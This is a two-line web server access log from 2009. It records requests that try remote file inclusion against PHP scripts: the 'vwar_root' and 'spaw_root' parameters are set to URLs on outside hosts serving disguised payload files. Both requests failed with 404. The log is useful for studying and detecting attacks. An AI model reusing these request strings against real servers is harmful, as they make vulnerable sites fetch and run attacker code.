84.201.208.50 - - [26/Jun/2009:23:54:37 -0500] "GET /logs/access_log.1239321600/convert/mvcw.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.122.79.200 - - [26/Jun/2009:23:55:43 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
